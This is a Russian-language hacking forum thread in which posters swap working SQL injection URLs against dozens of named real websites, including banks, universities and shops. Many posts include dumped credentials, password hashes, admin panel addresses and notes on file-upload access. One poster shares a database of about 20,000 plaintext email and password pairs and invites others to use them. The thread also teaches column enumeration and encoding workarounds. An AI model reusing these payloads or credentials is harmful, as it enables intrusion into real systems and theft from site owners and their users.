не смог колонки подобрать 0_о
колонка юзера - uname
пасс не подобрал :p

http://www.migaweb.de/downloads.php?id=-10+union+select+1,2,3,4,5,6,tAbLe_nAmE,8,9,10+FrOm +InFoRmAtIoN_ScHeMa.tAbLeS+LiMiT+28,2
таблицы :
admin
admin_user
admin_user2
admin_user_allow
admin_intra
admin_intra_acc

Чё то у меня сегодня проблемы с колонками 0о

http://www.uprava.org/section.php?id=34'
http://www.shamray.ru/show.php?id=31'

http://www.api-digital.com/news.php?id=-2%20union%20select%201,2,3,4,5,6/*

http://www.campedello.it/news.php?id=-2%20union%20select%201/*

http://www.informadanza.com/eventi/news.php?id=-9329%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17/*

http://www.bendruomenes.lt/news.php?id=-17440%20union%20select%201,2,3,id,5,concat(usernam e,char(58),phone,char(58),password),7,8,9,10%20fro m%20users/*

http://www.marotori.com/news.php?id=-5%20union%20select%201,2,3,concat(user_name,char(5 8),user_password),5,6%20from%20users/*

http://fat-cat.co.uk/fatcat/news.php?id=-407%20union%20select%201,id,concat(username,char(5 8),email,char(58),password),4,5,6,7,8,9,0,1,2%20fr om%20users/*

http://www.arip.co.th/2006/news.php?id=-406101%20union%20select%201,2,3,AES_DECRYPT(AES_EN CRYPT(concat(user,char(58),password),0),0),5,6,7,8 ,9,0,11,12,13%20from%20mysql.user/*
___

2 Spyder Да пусть выкладывает- тебе мешает чтоли? он выклдывает мы подбираем, какие проблемы
http://www.uprava.org/section.php?id=34+UNION+SELECT+1,2,3,4,5,6,VERSION ()--

2KP0t_f!nd
колонки бы хоть подобрал..
http://www.uprava.org/section.php?id=-1+union+select+1,2,3,4,5,6,7/*
http://www.shamray.ru/show.php?id=-1+union+select+user()/* - вывод в титле

http://www.apahelpcenter.org/articles/topic.php?id=-1+union+select+version()
оффтоп
2 KPOT_f!nd
вот нафиг выкладывать ссылки с кавычками. Составляй запрос, а если не умеешь - читай статьи
хакеры млин
и не надо удалять

http://www.migaweb.de/downloads.php?id=-10+union+select+1,2,3,4,5,6,tAbLe_nAmE,8,9,10+FrOm +InFoRmAtIoN_ScHeMa.tAbLeS+LiMiT+28,2
таблицы :
admin
admin_user
admin_user2
admin_user_allow
admin_intra
admin_intra_acc

Чё то у меня сегодня проблемы с колонками 0о
а если не умеешь - читай статьи
хакеры млин
2Spyder
я бы посоветовал тебе почитать статьи
вот тебе все колонки http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null ,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COL UMNS/*
если имелось ввиду те таблицы что ты написал то вот пример одной из них ;)
http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null ,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COL UMNS+WHERE+TABLE_NAME=char(97,100,109,105,110)/*

http://www.negotiationrussia.ru/index.php?id=-1+union+select+version(),2/*
Таблицы не подобрал.

http://prazdnik.com.ua/yslyga.php?id=-1+union+select+1,login,pass,4,5,6,7+from+user/*

логин: Zhuk_vv
пароль: голод
Админка: http://www.prazdnik.com.ua/admin

2 }{0TT@БЬ)Ч
спасибо что волнуешься за мои знания, но не стоит ;)
2 Constantine
я не понимаю смысла просто 0о
http://www.joesportsfan.com/mediaspace/?id=-14+union+select+1,2,3,4,convert(concat(username,ch ar(58),password)+using+latin1),6,7,8,9,10,11,12,13 ,14+from+admin+limit+1,1
jmajor:chicken
админка
http://www.joesportsfan.com/admin/
есть возможность заливки картинок

http://www.kinovdom.ru/item.php?id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20/*

http://www.grandtour.ru/cgi-bin/hotels.cgi?country=%D4%F0%E0%ED%F6%E8%FF&id=-1+union+select+1,2,3,4,version(),user(),database() ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

http://www.ixbt.com/news/news.php?id=53979'

Инет глючит, не грузит странички дальше :(

http://www.ixbt.com/news/news.php?id=53979'

Инет глючит, не грузит странички дальше :(


Было это уже...

(http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,0x707265766564203a44,4,5,6,7,8 ,9,10,11/*)

Ну извиняйте тогда :)

http://www.security-outlet.com/infopages/extended.php?id=-229+UNION+SELECT+1,2,3,4,5,6,7,database(),9,10,11, 12,13,14,15,16,17/*

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,concat(login,0x3a,password),4,5 ,6,7,8,9,10,11,12,13,14,15+from+users/*
чистые login:рass

//upd:
http://www.proaudio.ru/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+from+users/*
в общем, столбик с паролем называется pin или что-то вроде того, не могу подобрать.. user-поля нет.

http://reusablebags.com/facts.php?id=4+UNION+SELECT+1,2,3,concat(user(),ch ar(58),version()),5,6,7/*

http://www.kiel.ru/?p=-1+UNION+SELECT+1,VERSION(),3,4,5--

http://www.radioguerrilla.ro/show.php?id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10,1 1/*

http://www.cedu.ro/burse.php?id=-1+union+select+1,user(),version(),4/*


Таблицы не подобрал.

2 Constantine
http://www.kiel.ru/?p=-1+UNION+SELECT+1,concat(user,0x3a,password),3,4,5+ from+mysql.user+limit+0,1/*
можно лимит поперебирать :)
на выходе MySQL4-hash
root:3c5054fa1cf76613
webadmin:3f0ce32102bbf13c
cactiuser:20c76fe95ba49194

<noindex>
agrocombank.kiev.ua
http://www.agrocombank.kiev.ua/modules.php?op=modload&name=AStatic&file=index&sid=-1+union+select+1,2,3,4/*


Дальше не рисковал, без проксей =(

</noindex>

http://www.jonnyguru.com/review_details.php?id=-1+union+select+1,version(),password,4,5,6,7,user() ,9,10,11,12,13+from+users/*

http://www.elx.ru/web/cam.php?id=-5+union+select+1,version(),3,4,5
http://hetwildeweten.com/site/events.php?id=-13+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13
=\

http://www.zaishu.com/shop.php?id=-13+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13+from+customers

http://www.taipeinavi.com/shop/shop.php?id=-102+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81 ,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,9 8,99,100,101,102+from+mysql.user/*
=D наркоманы скрипт писали. Сайт ещё на китайском)) надо юзать convert, а хрен раззберёщшь какая там кодировка
Если кто знает китайский может раберётесь =)

=D наркоманы скрипт писали. Сайт ещё на китайском)) надо юзать convert, а хрен раззберёщшь какая там кодировка
Если кто знает китайский может раберётесь =)
а 4ё АЕС уже не в моде? =\

http://www.imagineenergy.net/shop.php?action=subcat&id=-2+union+select+1,2

http://www.artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,login,5,6,7,8,9,10,11,12,13,1 4+from+users/*

Логины.

http://www.artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,password,5,6,7,8,9,10,11,12,1 3,14+from+users/*

Пароли в md5.

http://www.artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,login,5,6,7,8,9,10,11,12,13,1 4+from+admins/*

Логин админа. Колонку с паролем админа не подобрал.
:cool:

Colkru, элементарно, Ватсон :)

http://www.artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,concat(login,0x3a,passw),5,6, 7,8,9,10,11,12,13,14+from+admins/*

Логины.



Пароли в md5.



Логин админа. Колонку с паролем админа не подобрал.
:cool:

Думаю так

http://www.artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,concat(login,char(58),passwor d),5,6,7,8,9,10,11,12,13,14+from+users/*
будет удобнее.

http://www.eval-net.org/index.php?id=-19+union+select+1,2,concat(mail,char(58),passwd),4 ,5,6,7+FROM+eval_members/*
Спасибо за помощь }{0TT@БЬ)Ч (https://forum.antichat.ru/member.php?u=21634)

Комания девелопер :) вот такие прогеры пошли...хотя хз, может они просто торгаши :)
Ну тогда такие у нас торгаши :D

http://www.multidmedia.com/news/news.php?id=-62+union+select+1,2,concat(username,0x3a,password) ,4,5+from+admin_users

юзер\пасс в открытом виде.

http://www.multidmedia.com/admin

админка.

ЗЫ можете там серийников нахреначить сколько влезет :) А то чёт она 150 фунтов стоит...

http://www.kiel.ru/?p=-1+UNION+SELECT+1,VERSION(),3,4,5--
2Constantine
вот все таблицы если надо больше инфы пиши в личку ;)
kiel_mail
kiel_mess
kiel_news
kiel_rasp
kiel_razd
kiel_stud

http://www.eimearquinn.com/shop.php?id=-14+union+select+1,2,3,4,concat(username,char(58),p assword),6,7,8,9,10,11,12,13,14+from+admin/*www.eimearquinn.com/admin - админка

http://www.multimedia.com/admin
где это ты тут админку увидел? 0о

http://opel.avto-city.ru/catalog.php?id=-1+union+select+concat(login,0x3a,pass),2,3,4,5,6,7 +from+admin/*
логин и пасс в чистом виде
opel:reklama
админка http://opel.avto-city.ru/admin/
есть права на загрузку любых файлов
=)

//тык-с)

2 Spyder: хз, не смотрел) лишь затестил, но скрипт не вызывал.. сейчас вижу)

http://www.iou-ramps.com/shop.php?id=-13+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13
2 n1†R0x
там СЕЙФ Мод Он вроде :p

http://www.lauschangriff.org/index.php?id=-1+union+select+1,2,version(),4,5,6,7,8/*

http://www.hs.aspu.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

Spyder, http://www.multidmedia.com/admin/ у меня тут админка. я хз что с тобой :)

http://www.spoono.com/php/tutorials/tutorial.php?id=-1+union+select+1,2,concat(user,char(58),password), 4,5,6,7,8+from+users/*

http://www.nero.com/eng/showpress.php?id=1015+order+by+13

Nero однако...хотя когда селект делаю не прокатывает :) ну хоть что-то :D

http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,3,4,5,6,7

http://director-online.com/buildArticle.php?id=-1147+union+select+1,2,3,4,5,6,7,8+from+user/*

чёт с выводом у мня напряги :(

2 n0ne
думаю, с парсингом проблем не будет ;)
http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,concat(username,0x3a,password,0 x3a,email),4,5,6,7+from+user
база юзеров в формате login:рassword:email
admin f1a81d782dea6a19bdca383bffe68452 ez@noreality.ch

http://director-online.com/buildArticle.php?id=-1147+union+select+1,2,3,4,5,6,7,8+from+user/*

чёт с выводом у мня напряги :(

бедный директор...сколько его мучают, а он всё он-лайн бедняга :)

_http://www.toumaz.com/news/news.php?id=1000+union+select+1,2,3,version(),user (),6/*

_http://www.uecmoedling.at/news/news.php?id=90+union+select+111,222,333,user(),555 ,666,version(),888,999/*

_http://www.aoecs.org/news/news.php?id=30+union+select+1,2,version(),user(),5 ,6,7,8/*

http://www.happyland-drink.ru/brands.php?id=46%20AND%201=0%20UNION%20SELECT%201, user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25/*

модный в своих кругах питерский сайт:

http://www.spbclub.ru/cgi-bin/content/show.php?dep=reviews&review=49+union+SELECT+null,null,password,null,nul l,null,null+FROM+users

_http://www.alutis.lt/news/news.php?id=-1+union+select+1,2,3,user(),version()/*

P.S. 4 поле, например user() можно посмотреть в имени рисунка (свойства картинки).



_http://www.austadiums.com/news/news.php?id=-1+union+select+user(),version()/*

_http://www.verticalworld.net/news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
количество колонок подобрал, но имхо нет прав на добавление новости, поэтому sql-inj не работает...

http://www.myminsk.com/catalog/counters.php?id=-1+union+select+1,2,table_name,4+from+INFORMATION_S CHEMA.TABLES+limit+0,1/*

http://www.stencilrevolution.com/tutorials/tutorialsview.php?id=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+u sers/*

http://www.stencilrevolution.com/tutorials/tutorialsview.php?id=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+p hpbb_users/*

http://dicom.spb.ru/tech/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.phpbuddy.com/article.php?id=-1+union+select+version(),2,user(),4,5,6/*


http://www.cgekuban.ru/tenders/arti.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.cgekuban.ru/tenders/arti.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+user/*это что типа таблицу подобрал? :D :D

http://www.jobit.ru/index.php?mod=employer&act=firminfo&id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version (),0x0),0x0),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20/*
таблицу подобрать не смог :)

http://www.urasvadba.ru/otziv.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31+from+information_schema.tables+limit+0,1/*
тут mysql5, но имхо пустышка) юзеров.нет

это что типа таблицу подобрал? :D :D
Опечатка... Когда нажимал контр+с, контр+в.. Я тут не подобрал таблицу, там пишит хостер что запрос отвергнут.

Скуля:

http://www.michaelyon-online.com/flf/emailit.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password), 6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+li mit+0,1/*

http://www.sewa.sk/index.php?id=-1+union+select+1,2,concat(username,0x3a,password), 4,5+from+users+limit+0,1/*

admin:sewa12321

Ни в чем не зашифровано.

Админка: http://www.sewa.sk/admin.php

http://www.ifmsa.pl/strona.php?id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13/*

http://www.eu.ki/millired/news.html?ACTION=show&ID=-4+union+select+1,password,3,email+from+users/*

http://www.tvfolk.net/artistVideo.php?ID=-1+union+select+1,USER(),3,VERSION(),5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5/*


http://www.yuretz.ru/prikol.php?id=-1+union+select+1,2,convert(USER()+using+cp1251),4, 5,6,7,8,9,0,1,2/*

http://legia.net/mecz.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6/*

Таблицу не подобрал ((.

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,USER(),6,7,8,9,0,1,2,3,4,5/*

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,USER(),6,7,8,9,0,1,2,3,4,5/*



http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 +from+users/*

http://moskva.kotoroy.net/gallery2.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version( ),14,15/*

2 Ksander && VampiRUS
http://forum.antichat.ru/showpost.php?p=306621&postcount=883
:)
login/pass выводил уже

_http://www.ournet.md/cgi/page.cgi?id=-1
улыбноло >)

не удержался :)
извините, если чей-то хоумпэйдж :D
http://emu-russia.km.ru/default.php?a=files&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(login,0x3a ,password),11,12,13,14,15+from+users

+upd:
http://www.hispanicprwire.com/news.php?l=in&id=-99+union+select+1,2,3,4,5,6,7,8,9/*

<noindex>
www.radabank.com.ua



http://www.radabank.com.ua/money/coin.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
Версия 4.0.20




p.s.чет на банки проперло, хоть бы боком не вылезло Оо.

</noindex>

unixdoc.ru
http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=-1
успешно натыкаемся на непохек :D
true:
http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=77+and+1=-1+union+select+1,2,3,4,5,6+from+information_schema .tables/*

http://www.tectonic.co.za/view.php?id=-1377+union+select+concat(username,0x3a,user_passwo rd),2+from+phpbb_users+order+by+2,1--
http://www.tectonic.co.za/view.php?id=-1377+union+select+concat(username,0x3a,password),2 +from+users+order+by+2,1--



http://www.real-art.ru/shop.php?id=5555406+union+select+id+from+admin--



http://www.mks-ks.ru/shop/cat.php?id=-1173+union+select+1,2,3,convert(database()+using+c p1251)/*


http://www.8marta.ru/shop.php?id=-266+union+select+1,concat(name,0x3a,password),3,4, 5,6,7,8,9,10+from+users+order+by+10,1/*

http://www.propro.ru/gallery/gallery.php?c=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

http://domoservice.ru/remont.php?catalog_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+use rs/*

http://www.tomhess.net/shop.php?id=-6+union+select+1,concat(name,0x3a,password),3+from +users/*

http://www.ueinternational.org/Mexico_info/mlna_articles.php?id=-85+union+select+1,database(),3,4,5,6,7,8,9--

http://www.adzu.edu.ph/Institutes_And_Centers/index.php?id=-3+union+select+1,2,table_name+from+information_sch ema.tables+limit+28,1
там есть таблица livehelp_users но она находится в другой базе

http://wineserver.ucdavis.edu/people/faculty.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,version(),19
такая же история
таблица users

может уже было...

http://www.afisha4u.ru/event.php?id=23&di=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),c har(58),user(),char(58),version()),10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26/*

http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,version(),3,4,5/*

http://www.stencilrevolution.com/tutorials/tutorialsview.php?id=-27+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27=\

http://www.theracersgroup.com/shop/car.php?id=-19+union+select+1,2,3,4,5,6,database(),8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36/*

http://www.freepoc.org/viewapp.php?id=-8+union+select+1,version(),3,4,5,6,7,8/*

Привет Spyder'у :D

http://www.bangkoknavi.com/shop/shop.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%2 0,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103,104,105+from+mysql.user/*

http://www.phparchitecture.com/howto_show.php?id=-5+union+select+1,2,version(),4,5

http://www.maldives.ru/perday.php?hid=-1+union+select+1,2,3,concat(username,0x3a,password )+from+users/*
admin:$1$Urvg1Snr$L6uDyha6v7XY5wMophhrN.

http://www.karlcore.com/articles/article.php?id=-6+union+select+1,2,3,4,version(),6

Spyder, Китай любит тебя :D

http://www.hongkongnavi.com/shop/shop.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81, 82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98 ,99,100,101,102,103,104,105+from+mysql.user/*

http://www.maldives.ru/perday.php?hid=-1+union+select+1,2,3,concat(username,0x3a,password )+from+users/*
admin:$1$Urvg1Snr$L6uDyha6v7XY5wMophhrN.
в добавление:
http://azur.ru/gelendzhik/db.php?owner=282+and+282=1+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,AES_DECRY PT(AES_ENCRYPT(concat(user,0x3a,password),0x0),0x0 ),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+ from+mysql.user/*
root:*AB3D38951ECD62929CF96E60B677D0A5B1C08FCB

ps: +toxa+ молодец, исправил :) я тока написать хотел)

http://www.boyersteel.com/products.php?id=-4+union+select+1,convert(version()+using+latin1),3 ,4/*

_http://kagul.ru/photooboy/index.php?action=detail&id=
самоя простя скула..


+видео по взлому сайта!
_http://rapidshare.com/files/20587714/bezpredel.rar.html я прсто ржал когда ломал его!!!

_http://kagul.ru/photooboy/index.php?action=detail&id=
самоя простя скула..
+видео по взлому сайта!
_http://rapidshare.com/files/20587714/bezpredel.rar.html я прсто ржал когда ломал его!!!лол ты где увидел там sql инъекцию ? :eek:

лол ты где увидел там sql инъекцию ? :eek:

.. если ты про видео.. его там нет! просто прикольнуло... решыл с другими поделится... люблю я разработчиков таких сайтов! :D

+
http://www.es-loule.edu.pt/index.php?op=d2&grupo='PO'%20union+select/**/0,2,3,4,5,6,7,8,9/*

http://www.fondsk.ru/article.php?id=-1+union+select+1,2,3,4,5,USER(),VERSION(),8,9,0,1, 2,3,4,5,6,7,8,9,0,1/*

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,222,333,4,5,6,7,888,9,1,2,3/*

Первая скуль, поэтому на правах нуба задам вопросик:
вот выше я подобрал количество, но когда я делаю такой запрос:
http://www.yuretz.ru/prikol.php?id=-1+union+select+1,user(),333,4,5,6,7,888,9,1,2,3/*
получаю пинка Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Понятно, что 2 несовместимых кодировки для юнион, но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)

но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)
Просто нужно использовать конвертирование в нужную тебе кодировку... Как ты наверно заметил тебе нужна cp1251:

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,convert(user()+using+cp1251),333, 4,5,6,7,888,9,1,2,3/*

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,222,333,4,5,6,7,888,9,1,2,3/*

Первая скуль, поэтому на правах нуба задам вопросик:
вот выше я подобрал количество, но когда я делаю такой запрос:
http://www.yuretz.ru/prikol.php?id=-1+union+select+1,user(),333,4,5,6,7,888,9,1,2,3/*
получаю пинка
Понятно, что 2 несовместимых кодировки для юнион, но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)

Я уже выкладывал


http://www.xmlhack.com/read.php?item=-1+union+select+1,2,3,4,5,6,7,8,TABLE_NAME,0,1+from +information_schema.tables/*

Я так понял, тут звонки по Америке нахаляву :) правда х3 каким образом, но все же :)
http://www.i711.com/about.php
сама инъекция:
http://www.i711.com/my711.php?tab=2&article=-1+union+select+1,2,concat(email,0x3a,passwd),4,5,6 ,7,8,9+from+users+limit+20623,1/*
20624 юзера, мыла:пароли в чистом виде.
пользуйтесь :p

http://www.tsb.kz/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

Сайт банка)

http://www.globelines.com.ph/FAQCategory.php?id=-8+union+select+1,2,convert(version()+using+latin1) ,4,5,6,7,8
----

Какойто интернет магазин.

http://www.iradium.fr/fr/carte/carte_destination.php?id=-1+union+select+concat(user,char(58),password),2,3+ from+mysql.user+limit+0,1/*
___
http://www.linspire.com/linspire_letter_archives.php?id=-1+union+select+1,version(),3,4/*
___
http://www.urallink.ru/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21/*

http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-232+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15/*

http://www.newssamara.ru/showNews.php?id=-1+union+select+111,222,333,444,555,version(),777,8 88,999,1010,1111,1212,1313,1414,1515/*

http://www.careysookocheff.com/index.php?id=-1+union+select+1,version(),3/*

http://www.slavneft.ru/press/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*

http://www.cecs.uwaterloo.ca/students/sessions_details.php?id=-666+union+select+1,2,3,4,version(),6,7,8,9,10,user (),12/*

http://ostro.org/shownews_tema.php?id=-223+union+select+1,2,version(),user(),5/*


http://www.mrc.uidaho.edu/mrc/team/printPeople.php?ID=-33+union+select+1,2,3,version(),5,user(),7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30/*

http://www.emanway.com/droos_sheaql.php?id=-3+union+select+1,2,version(),4,5,6/*
сайт на арабском =) там всё справа налево
update\/
http://loserzcomic.com/index.php?id=-8+union+select+1,2,3,4,version(),6,7,8/*
http://www.boyersteel.com/products.php?id=-4+union+select+1,convert(version()+using+latin1),3 ,4/*
http://www.worstpreviews.com/review.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40
http://www.reusablebags.com/facts.php?id=-7+union+select+1,2,3,4,5,6,7/*
http://tellertest.com/tellers.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,72,71,73,74,75,76,77,78/*
http://www.bathtubmusic.com/genre.php?id=-2+union+select+1,version()
http://www.horoskopa.com/signs.php?id=-2+union+select+1,convert(version()+using+cp1251)
http://bulgaria-vidin.com/estate-new-window.php?es=-10+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10

http://www.gridcc.org/getfile.php?id=-200+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17/*

http://www.pay-sys.com/modules/articles/print.php?id=-20+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20/*
после каждого обнавления странички вылазит окошко с предложеим выбрать принтер что бы распечатать. пока столбцы побирал - взбесило =)

http://www.aarda.org/research/research_display.php?ID=-1+union+select+1,2,3,concat(username,char(58),pass ),5,6,7+from+user+limit+0,1/*

http://www.lautrecampagne.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table _name,15,16,17,18,19,20,null,22,23,24+from+INFORMA TION_SCHEMA.TABLES+limit+0,1/*

http://eierstock-krebs.de/start.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+from+sites/*

после каждого обнавления странички вылазит окошко с предложеим выбрать принтер что бы распечатать. пока столбцы побирал - взбесило =)
xoops куле ;)

http://articles.org.ru/cfaq/index.php?catid=-1+union+select+convert(user()+using+cp1251),2/*

bestmove.ru

http://bestmove.ru/index2.php?catid=1+and+1=2+union+select+1,2,3,4,5, 6,7,8,9,10,11,table_NAME,13,14444+from+INFORMATION _SCHEMA.tables--

http://bestmove.ru/index2.php?catid=1+and+1=2+union+select+1,2,3,4,5, 6,7,8,9,10,11,column_name,13,14444+from+INFORMATIO N_SCHEMA.COLUMNS--

http://bestmove.ru/index2.php?catid=1+and+1=2+union+select+1,2,3,4,5, 6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(email,0x78), 0x78),13,14444+from+admin_dvdonly.comments--

http://bestmove.ru/index2.php?catid=1+and+1=2+union+select+1,2,3,4,5, 6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(pwd,0x78),0x 78),13,14444+from+admin_dvdonly.users--

http://bestmove.ru/index2.php?catid=1+and+1=2+union+select+1,2,3,4,5, 6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(concat(id,ch ar(58),name,char(58),cod,char(58),time,char(58),Mb ),0x78),0x78),13,14444+from+admin_bestxxx.catalog--

http://bestmove.ru/phpmyadmin/

http://www.phpdoc.org/news.php?id=-1+union+select+1,concat(name,char(58),password),3, 4,5+from+users/*

http://www.keckobservatory.org/article.php?id=-99+union+select+1,2,3,4,5,6,7,8+from+mysql.user/*
Дальше сами =)
http://www.apahelpcenter.org/featuredtopics/feature.php?id=-6+union+select+password,2,3,user(),5,version(),7+f rom+users/*
Пароли в чистом виде

http://www.witze-welt.de/videos/showvideo.php?id=-1+union+select+1,2,3,password,5,6,7,8,9,10,11,12,1 3,14,15,16+from+mysql.user/*

ООО КБ "Эргобанк"
http://www.ergobank.ru/root/news/newsGen.php?id=-3+union+select+1,2,convert(version()+using+latin1)

http://hightower.fmp.com/weblogitem.php?id=-1+union+select+concat(username,char(58),password), 2,3,4,5,6+from+user+limit+0,1/*

Пассы в чистом виде)

http://dety.info/region.php?id=-1+union+select+1,2,concat(user,char(58),password), 4,5,6+from+user+limit+0,1/*

хе, и логин и пароль admin, правда в админку (http://dety.info/admin) с таким логином и паролем не попадеш.

http://www.krasota.ru/krasota/news/show.htpl?id=-1+union+select+1,2,3,4,5,concat(database(),char(58 ),user(),char(58),version()),7,8,9,10,11,12,13/*

http://www.sibinfo.org/forma.php?classid=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*

http://www.livemaster.ru/blogmessage.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,concat(email,char(58),password),17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42+from+users+limit+258,1/*

259 пользователей, пассы в чистом виде.

http://www.fortress.ru/products.php?id=-1+union+select+1,convert(concat(login,0x3a,passwor d)+using+latin1),3,4,5,6,7,8,9,10+from+users+limit +0,1/*
